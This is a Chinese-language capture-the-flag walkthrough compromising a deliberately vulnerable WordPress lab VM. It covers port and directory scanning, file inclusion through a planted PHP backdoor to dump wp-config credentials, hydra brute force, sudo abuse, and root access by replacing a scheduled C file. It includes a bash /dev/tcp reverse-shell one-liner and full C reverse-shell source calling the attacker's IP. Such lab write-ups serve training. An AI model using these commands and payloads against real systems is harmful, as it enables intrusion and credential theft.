1.信息收集
arp-scan -l
┌──(root㉿kali)-[~/kali/red]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.9.22
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.9.4 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.9.32 08:00:27:89:06:41 PCS Systemtechnik GmbH
nmap -sn 192.168.90/24
┌──(root㉿kali)-[~/kali/red]
└─# nmap -sn 192.168.9.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-18 00:51 EST
Nmap scan report for 192.168.9.2
Host is up (0.0028s latency).
MAC Address: D4:8F:A2:9F:51:49 (Huawei Device)
Nmap scan report for 192.168.9.32
Host is up (0.00080s latency).
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.9.22
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 2.64 seconds
端口探测
nmap -sC -sV -sT -A 192.168.9.32 --min-rate 10000
┌──(root㉿kali)-[~/kali/red]
└─# nmap -sC -sV -sT -A 192.168.9.32 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-18 00:59 EST
Nmap scan report for redrocks.win (192.168.9.32)
Host is up (0.00093s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d5365835252c4127249be335dd1e71c (RSA)
| 256 06610a49864364cab00c0f09177b33ba (ECDSA)
|_ 256 9b8d90472ac1dc11287d57e08a23b469 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
|_http-generator: WordPress 5.8.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms redrocks.win (192.168.9.32)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds
框架扫描
┌──(root㉿kali)-[~/kali/red]
└─# whatweb http://192.168.9.32
http://192.168.9.32 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.9.32], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]
可以看到是wordpress框架,5.8.1版本
┌──(root㉿kali)-[/home/kali/kali]
└─# wpscan --url "http://192.168.9.32" -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.9.32/ [192.168.9.32]
[+] Started: Mon Dec 18 01:08:51 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.9.32/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.9.32/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.9.32/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.9.32/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.9.32/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.9.32/, Match: 'WordPress 5.8.1'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] administrator
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.9.32/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Dec 18 01:08:53 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 11.932 KB
[+] Data Received: 133.691 KB
[+] Memory used: 156.277 MB
[+] Elapsed time: 00:00:01
目录扫描
┌──(root㉿kali)-[/home/kali/kali]
└─# dirsearch -u "http://192.168.9.32"
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/kali/reports/http_192.168.9.32/_23-12-18_01-11-15.txt
Target: http://192.168.9.32/
[01:11:15] Starting:
[01:11:16] 301 - 0B - /%2e%2e//google.com -> http://192.168.9.32/%2e%2e/google.com
[01:11:19] 403 - 339B - /.git
[01:11:19] 403 - 339B - /.git/
[01:11:19] 403 - 339B - /.git/COMMIT_EDITMSG
[01:11:19] 403 - 339B - /.git/branches/
[01:11:19] 403 - 339B - /.git/config
[01:11:19] 403 - 339B - /.git/head
[01:11:19] 403 - 339B - /.git/HEAD
[01:11:19] 403 - 339B - /.git/FETCH_HEAD
[01:11:19] 403 - 339B - /.git/description
[01:11:19] 403 - 339B - /.git/hooks/
[01:11:20] 403 - 339B - /.git/hooks/commit-msg
[01:11:19] 403 - 339B - /.git/hooks/applypatch-msg
[01:11:20] 403 - 339B - /.git/hooks/post-update
[01:11:20] 403 - 339B - /.git/hooks/pre-commit
[01:11:20] 403 - 339B - /.git/index
[01:11:20] 403 - 339B - /.git/hooks/pre-applypatch
[01:11:20] 403 - 339B - /.git/hooks/pre-push
[01:11:20] 403 - 339B - /.git/hooks/prepare-commit-msg
[01:11:20] 403 - 339B - /.git/hooks/pre-receive
[01:11:20] 403 - 339B - /.git/hooks/update
[01:11:20] 403 - 339B - /.git/info/attributes
[01:11:20] 403 - 339B - /.git/info/refs
[01:11:20] 403 - 339B - /.git/logs/refs
[01:11:20] 403 - 339B - /.git/logs/HEAD
[01:11:20] 403 - 339B - /.git/hooks/pre-rebase
[01:11:20] 403 - 339B - /.git/info/
[01:11:20] 403 - 339B - /.git/objects/
[01:11:20] 403 - 339B - /.git/logs/
[01:11:20] 403 - 339B - /.git/refs/heads
[01:11:20] 403 - 339B - /.git/logs/refs/heads
[01:11:20] 403 - 339B - /.git/objects/info/packs
[01:11:20] 403 - 339B - /.git/refs/heads/master
[01:11:20] 403 - 339B - /.git/info/exclude
[01:11:20] 403 - 339B - /.git/logs/refs/heads/master
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin/HEAD
[01:11:20] 403 - 339B - /.git/refs/remotes
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin
[01:11:20] 403 - 339B - /.git/refs/tags
[01:11:20] 403 - 339B - /.git/refs/remotes/origin/master
[01:11:20] 403 - 339B - /.git/logs/head
[01:11:20] 403 - 339B - /.git/logs/refs/remotes/origin/master
[01:11:20] 403 - 339B - /.git/refs/remotes/origin/HEAD
[01:11:20] 403 - 339B - /.git/refs/remotes/origin
[01:11:20] 403 - 339B - /.git/refs/
[01:11:20] 403 - 339B - /.git/logs/refs/remotes
[01:11:20] 403 - 339B - /.git/packed-refs
[01:11:20] 403 - 277B - /.ht_wsr.txt
[01:11:20] 403 - 277B - /.htaccess.bak1
[01:11:20] 403 - 277B - /.htaccess.sample
[01:11:20] 403 - 277B - /.htaccess.save
[01:11:20] 403 - 277B - /.htaccess.orig
[01:11:20] 403 - 277B - /.htaccessOLD2
[01:11:20] 403 - 277B - /.htaccess_sc
[01:11:20] 403 - 277B - /.htaccess_extra
[01:11:20] 403 - 277B - /.htm
[01:11:20] 403 - 277B - /.htaccessBAK
[01:11:20] 403 - 277B - /.htpasswd_test
[01:11:20] 403 - 277B - /.htaccess_orig
[01:11:20] 403 - 277B - /.html
[01:11:20] 403 - 277B - /.htpasswds
[01:11:20] 403 - 277B - /.htaccessOLD
[01:11:20] 403 - 277B - /.httr-oauth
[01:11:23] 403 - 277B - /.php
[01:11:27] 301 - 0B - /0 -> http://192.168.9.32/0/
[01:11:34] 301 - 0B - /adm/index.php -> http://192.168.9.32/adm/
[01:11:34] 302 - 0B - /admin -> http://redrocks.win/wp-admin/
[01:11:34] 301 - 0B - /admin. -> http://192.168.9.32/admin
[01:11:35] 302 - 0B - /admin/ -> http://redrocks.win/wp-admin/
[01:11:35] 301 - 0B - /admin/index.php -> http://192.168.9.32/admin/
[01:11:36] 301 - 0B - /admin/mysql/index.php -> http://192.168.9.32/admin/mysql/
[01:11:36] 301 - 0B - /admin/mysql2/index.php -> http://192.168.9.32/admin/mysql2/
[01:11:36] 301 - 0B - /admin/phpmyadmin2/index.php -> http://192.168.9.32/admin/phpmyadmin2/
[01:11:36] 301 - 0B - /admin/phpmyadmin/index.php -> http://192.168.9.32/admin/phpmyadmin/
[01:11:36] 301 - 0B - /admin/PMA/index.php -> http://192.168.9.32/admin/PMA/
[01:11:36] 301 - 0B - /admin/phpMyAdmin/index.php -> http://192.168.9.32/admin/phpMyAdmin/
[01:11:36] 301 - 0B - /admin/pma/index.php -> http://192.168.9.32/admin/pma/
[01:11:36] 301 - 0B - /admin2/index.php -> http://192.168.9.32/admin2/
[01:11:37] 301 - 0B - /admin_area/index.php -> http://192.168.9.32/admin_area/
[01:11:42] 301 - 0B - /adminarea/index.php -> http://192.168.9.32/adminarea/
[01:11:42] 301 - 0B - /admincp/index.php -> http://192.168.9.32/admincp/
[01:11:43] 301 - 0B - /adminer/index.php -> http://192.168.9.32/adminer/
[01:11:44] 301 - 0B - /administrator/index.php -> http://192.168.9.32/administrator/
[01:11:47] 301 - 0B - /apc/index.php -> http://192.168.9.32/apc/
[01:11:49] 301 - 0B - /asset.. -> http://192.168.9.32/asset
[01:11:49] 301 - 0B - /atom -> http://192.168.9.32/feed/atom/
[01:11:50] 301 - 0B - /axis2//axis2-web/HappyAxis.jsp -> http://192.168.9.32/axis2/axis2-web/HappyAxis.jsp
[01:11:50] 301 - 0B - /axis//happyaxis.jsp -> http://192.168.9.32/axis/happyaxis.jsp
[01:11:50] 301 - 0B - /axis2-web//HappyAxis.jsp -> http://192.168.9.32/axis2-web/HappyAxis.jsp
[01:11:51] 301 - 0B - /bb-admin/index.php -> http://192.168.9.32/bb-admin/
[01:11:51] 301 - 0B - /bitrix/admin/index.php -> http://192.168.9.32/bitrix/admin/
[01:11:54] 301 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.9.32/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[01:11:55] 301 - 0B - /claroline/phpMyAdmin/index.php -> http://192.168.9.32/claroline/phpMyAdmin/
[01:11:59] 302 - 0B - /dashboard -> http://redrocks.win/wp-admin/
[01:11:59] 302 - 0B - /dashboard/ -> http://redrocks.win/wp-admin/
[01:12:00] 301 - 0B - /db/index.php -> http://192.168.9.32/db/
[01:12:00] 301 - 0B - /dbadmin/index.php -> http://192.168.9.32/dbadmin/
[01:12:03] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> http://192.168.9.32/engine/classes/swfupload/swfupload_f9.swf
[01:12:04] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> http://192.168.9.32/engine/classes/swfupload/swfupload.swf
[01:12:04] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://192.168.9.32/etc/lib/pChart2/examples/imageMap/
[01:12:05] 301 - 0B - /extjs/resources//charts.swf -> http://192.168.9.32/extjs/resources/charts.swf
[01:12:05] 302 - 0B - /favicon.ico -> http://redrocks.win/wp-includes/images/w-logo-blue-white-bg.png
[01:12:06] 301 - 0B - /feed -> http://192.168.9.32/feed/
[01:12:10] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://192.168.9.32/html/js/misc/swfupload/swfupload.swf
[01:12:11] 301 - 0B - /index.php -> http://192.168.9.32/
[01:12:11] 301 - 0B - /index.php/login/ -> http://192.168.9.32/login/
[01:12:12] 301 - 0B - /install/index.php?upgrade/ -> http://192.168.9.32/install/?upgrade/
[01:12:13] 301 - 0B - /jkstatus; -> http://192.168.9.32/jkstatus
[01:12:15] 200 - 7KB - /license.txt
[01:12:16] 302 - 0B - /login -> http://redrocks.win/wp-login.php
[01:12:16] 302 - 0B - /login/ -> http://redrocks.win/wp-login.php
[01:12:16] 301 - 0B - /login.wdm%20 -> http://192.168.9.32/login.wdm
[01:12:20] 301 - 0B - /modelsearch/index.php -> http://192.168.9.32/modelsearch/
[01:12:21] 301 - 0B - /myadmin/index.php -> http://192.168.9.32/myadmin/
[01:12:21] 301 - 0B - /myadmin2/index.php -> http://192.168.9.32/myadmin2/
[01:12:22] 301 - 0B - /mysql-admin/index.php -> http://192.168.9.32/mysql-admin/
[01:12:22] 301 - 0B - /mysql/index.php -> http://192.168.9.32/mysql/
[01:12:22] 301 - 0B - /mysqladmin/index.php -> http://192.168.9.32/mysqladmin/
[01:12:22] 301 - 0B - /New%20folder%20(2) -> http://192.168.9.32/New%20folder%20(2
[01:12:25] 301 - 0B - /panel-administracion/index.php -> http://192.168.9.32/panel-administracion/
[01:12:26] 301 - 0B - /phpadmin/index.php -> http://192.168.9.32/phpadmin/
[01:12:27] 301 - 0B - /phpma/index.php -> http://192.168.9.32/phpma/
[01:12:27] 301 - 0B - /phpmyadmin!! -> http://192.168.9.32/phpmyadmin
[01:12:28] 301 - 0B - /phpMyAdmin.old/index.php -> http://192.168.9.32/phpMyAdmin.old/
[01:12:28] 301 - 0B - /phpmyadmin-old/index.php -> http://192.168.9.32/phpmyadmin-old/
[01:12:28] 301 - 0B - /phpMyAdmin/index.php -> http://192.168.9.32/phpMyAdmin/
[01:12:28] 301 - 0B - /phpmyadmin/index.php -> http://192.168.9.32/phpmyadmin/
[01:12:28] 301 - 0B - /phpmyadmin0/index.php -> http://192.168.9.32/phpmyadmin0/
[01:12:28] 301 - 0B - /phpMyAdmin/phpMyAdmin/index.php -> http://192.168.9.32/phpMyAdmin/phpMyAdmin/
[01:12:28] 301 - 0B - /phpmyadmin/phpmyadmin/index.php -> http://192.168.9.32/phpmyadmin/phpmyadmin/
[01:12:28] 301 - 0B - /phpmyadmin1/index.php -> http://192.168.9.32/phpmyadmin1/
[01:12:28] 301 - 0B - /phpmyadmin2/index.php -> http://192.168.9.32/phpmyadmin2/
[01:12:28] 301 - 0B - /phpMyadmin_bak/index.php -> http://192.168.9.32/phpMyadmin_bak/
[01:12:28] 301 - 0B - /phpMyAdminold/index.php -> http://192.168.9.32/phpMyAdminold/
[01:12:29] 301 - 0B - /pma-old/index.php -> http://192.168.9.32/pma-old/
[01:12:29] 301 - 0B - /PMA/index.php -> http://192.168.9.32/PMA/
[01:12:29] 301 - 0B - /pma/index.php -> http://192.168.9.32/pma/
[01:12:29] 301 - 0B - /PMA2/index.php -> http://192.168.9.32/PMA2/
[01:12:30] 301 - 0B - /pmamy/index.php -> http://192.168.9.32/pmamy/
[01:12:30] 301 - 0B - /pmamy2/index.php -> http://192.168.9.32/pmamy2/
[01:12:30] 301 - 0B - /pmd/index.php -> http://192.168.9.32/pmd/
[01:12:32] 301 - 0B - /rating_over. -> http://192.168.9.32/rating_over
[01:12:32] 200 - 3KB - /readme.html
[01:12:34] 200 - 108B - /robots.txt
[01:12:34] 301 - 0B - /roundcube/index.php -> http://192.168.9.32/roundcube/
[01:12:34] 301 - 0B - /rss -> http://192.168.9.32/feed/
[01:12:35] 403 - 277B - /server-status
[01:12:35] 403 - 277B - /server-status/
[01:12:38] 301 - 0B - /siteadmin/index.php -> http://192.168.9.32/siteadmin/
[01:12:38] 302 - 0B - /sitemap.xml -> http://redrocks.win/wp-sitemap.xml
[01:12:39] 301 - 0B - /sql/index.php -> http://192.168.9.32/sql/
[01:12:40] 301 - 0B - /static.. -> http://192.168.9.32/static
[01:12:41] 301 - 0B - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates -> http://192.168.9.32/sugarcrm/?module=Accounts&action=ShowDuplicates
[01:12:41] 301 - 0B - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates -> http://192.168.9.32/sugarcrm/?module=Contacts&action=ShowDuplicates
[01:12:43] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://192.168.9.32/templates/rhuk_milkyway/
[01:12:43] 301 - 0B - /templates/beez/index.php -> http://192.168.9.32/templates/beez/
[01:12:43] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://192.168.9.32/templates/ja-helio-farsi/
[01:12:45] 301 - 0B - /tmp/index.php -> http://192.168.9.32/tmp/
[01:12:45] 301 - 0B - /tools/phpMyAdmin/index.php -> http://192.168.9.32/tools/phpMyAdmin/
[01:12:46] 301 - 0B - /typo3/phpmyadmin/index.php -> http://192.168.9.32/typo3/phpmyadmin/
[01:12:51] 301 - 0B - /web/phpMyAdmin/index.php -> http://192.168.9.32/web/phpMyAdmin/
[01:12:51] 301 - 0B - /webadmin/index.php -> http://192.168.9.32/webadmin/
[01:12:52] 301 - 315B - /wp-admin -> http://192.168.9.32/wp-admin/
[01:12:52] 200 - 0B - /wp-config.php
[01:12:52] 302 - 0B - /wp-admin/ -> http://redrocks.win/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.32%2Fwp-admin%2F&reauth=1
[01:12:52] 400 - 1B - /wp-admin/admin-ajax.php
[01:12:53] 200 - 0B - /wp-content/
[01:12:53] 301 - 317B - /wp-content -> http://192.168.9.32/wp-content/
[01:12:53] 409 - 3KB - /wp-admin/setup-config.php
[01:12:53] 200 - 509B - /wp-admin/install.php
[01:12:53] 500 - 609B - /wp-content/plugins/akismet/akismet.php
[01:12:53] 500 - 0B - /wp-content/plugins/hello.php
[01:12:53] 403 - 277B - /wp-content/upgrade/
[01:12:53] 403 - 277B - /wp-content/uploads/
[01:12:53] 500 - 609B - /wp-content/plugins/akismet/admin.php
[01:12:53] 301 - 0B - /wp-content/plugins/adminer/inc/editor/index.php -> http://192.168.9.32/wp-content/plugins/adminer/inc/editor/
[01:12:53] 301 - 318B - /wp-includes -> http://192.168.9.32/wp-includes/
[01:12:53] 200 - 0B - /wp-cron.php
[01:12:53] 403 - 277B - /wp-includes/
[01:12:53] 200 - 110KB - /wp-json/
[01:12:53] 200 - 595B - /wp-json/wp/v2/users/
[01:12:53] 200 - 0B - /wp-includes/rss-functions.php
[01:12:53] 301 - 0B - /wp-register.php -> http://redrocks.win/wp-login.php?action=register
[01:12:53] 302 - 0B - /wp-signup.php -> http://redrocks.win/wp-login.php?action=register
[01:12:53] 200 - 2KB - /wp-login.php
[01:12:54] 301 - 0B - /www/phpMyAdmin/index.php -> http://192.168.9.32/www/phpMyAdmin/
[01:12:54] 405 - 42B - /xmlrpc.php
[01:12:54] 301 - 0B - /xampp/phpmyadmin/index.php -> http://192.168.9.32/xampp/phpmyadmin/
扫出来的大多是重定向301,访问的话,一直在爱的转圈圈
所以我们将redrocks.win添加到解析目录中
vim /etc/hosts
192.168.9.32 redrocks.win
2.漏洞利用
根据页面提示,说明这个已经有漏洞了,需要我们去找到后门,用gobuster扫一下,找php后缀的
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.9.32 -x php -t 30
爆破得到NetworkFileManagerPHP.php
文件包含
访问是一个空白页面,说明被php解析了,猜测是文件包含漏洞,用wfuzz扫看看收什么参数
是一个key参数,带入?key=../../../../../etc/passwd,有回显,去看wp-config.php文件,
一般wordpress框架的在wp-config.php中都会有用户名和密码
因为php文件会被解析,所以我们直接利用php伪协议
http://192.168.9.32/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php
PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB
解码得到: john R3v_m4lwh3r3_k1nG!!
ssh连接
连接不上,应该是密码出错了,但是他又给密码了
猜测是顺序乱了,用hashcat 中best64.rule规则
1.先将原密码放到123.txt中
2.hashcat --stdout 123.txt -r /usr/share/hashcat/rules/best64.rule >pass.txt
hashcat:这是用于密码破解的命令行实用程序。
--stdout:这个选项告诉 hashcat 将生成的密码候选项打印到标准输出(stdout),而不是尝试破解密码。
1.txt:这是包含潜在密码列表的输入单词列表。
-r /usr/share/hashcat/rules/best64.rule:这个选项指定了一个规则文件的路径(在这种情况下是 best64.rule),该文件包含应用于单词列表中的每个单词以生成变体的转换规则。
> pass.txt:这部分命令将生成的密码候选项从标准输出重定向到名为 pass.txt 的文件。
hydra爆破
echo “R3v_m4lwh3r3_k1nG!!”>123.txt
感叹号前面要加 \
3.权限提升
连接之后,它过一段时间会自动断掉,密码会更改,所以断掉之后要重新爆破
当你cat的时候,他会进入vi编辑模式,相反
cat和vi功能互换
sudo -l
发现/usr/bin/time只有ippsec用户,才可以执行
sudo -u ippsec /usr/bin/time /bin/bash
转到ippsec用户
sudo: 以超级用户或其他用户的身份执行命令。在这里,它要求你使用 ippsec 用户的权限执行后续的命令。
-u ippsec: 指定要切换到的用户,这里是 ippsec 用户。
/usr/bin/time: 在 /usr/bin/ 目录中找到 time 命令
/bin/bash: 启动一个新的 Bash shell。
反弹shell
sudo -u ippsec /usr/bin/time /bin/bash
dash -i >& /dev/tcp/192.168.9.22/6666 0>&1
python3 -c 'import pty;pty.spawn("/bin/bash")'
这便建议你,先写好,然后直接复制粘贴
它断掉的速度很快,但是进入ippsec用户使用反弹shell连接
终端断掉了,反弹shell不会断
find / -group ippsec -type d 2>/dev/null | grep -v proc
查看当前用户ippsec的可执行程序
root权限
1.首先cd到tmp目录中,然后在cd到/var/www/wordpress/.git目录
ippsec@red:/var/www/wordpress$ cd .git
cd .git
ippsec@red:/var/www/wordpress$ cd .git
cd .git
ippsec@red:/var/www/wordpress/.git$ ls
ls
rev supersecretfileuc.c
2.发现rev是一个可执行的文件,想到将supersecretfileuc.c文件替换成shell脚本
将原来的rev和supersecretfileuc.c删除
创建supersecretfileuc.c shell脚本
将设置改为自己的ip地址,端口
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 6666;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("192.168.9.22");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"dash", NULL};
execve("dash", argv, NULL);
return 0;
}
写进之后,静静等待rev的自动执行即可
kali 要先监听端口